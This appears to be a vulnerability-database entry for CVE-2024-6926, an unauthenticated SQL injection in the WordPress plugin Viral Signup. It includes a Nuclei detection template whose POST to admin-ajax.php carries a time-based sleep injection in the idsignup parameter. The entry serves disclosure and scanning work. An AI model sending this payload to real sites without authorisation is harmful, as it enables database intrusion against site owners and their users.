CVE-2024-6926: Viral Signup <= 2.1 - SQL Injection

日期: 2025-08-01 | 影响软件: Viral Signup | POC: 已公开

漏洞描述

The Viral Signup limited opt-in with viral referral sharing plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 2.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

PoC代码[已公开]

id: CVE-2024-6926

info:
  name: Viral Signup <= 2.1 -  SQL Injection
  author: s4e-io
  severity: critical
  description: |
    The Viral Signup limited opt-in with viral referral sharing plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 2.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
  reference:
    - https://www.usom.gov.tr/bildirim/tr-24-1387
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/viral-signup/viral-signup-21-unauthenticated-sql-injection
    - https://wpscan.com/vulnerability/9ce96ce5-fcf0-4d7a-b562-f63ea3418d93/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-6926
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-6926
    epss-score: 0.71358
    epss-percentile: 0.98677
  metadata:
    max-request: 2
    vendor: viral-signup
    product: viral-signup
    framework: wordpress
    publicwww-query: "/wp-content/plugins/viral-signup"
  tags: time-based-sqli,cve,cve2024,wpscan,wp-plugin,wordpress,viral-signup

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "/wp-content/plugins/viral-signup")'
        internal: true

  - raw:
      - |
        @timeout 20s
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=wow_signup_send_free&idsignup=(select*from(select(sleep(6)))a)

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'status_code == 200'
        condition: and
# digest: 490a0046304402202d96113f8629cb0d369dfc08eec2804828f1ad3469a723a6202f71727a3ca4bc022026533125e0b2eff2f2c919f4cafae38f06c066f29caa09654f89cd42ccbd0c6d:922c64590222798bb761d5b6d8e72950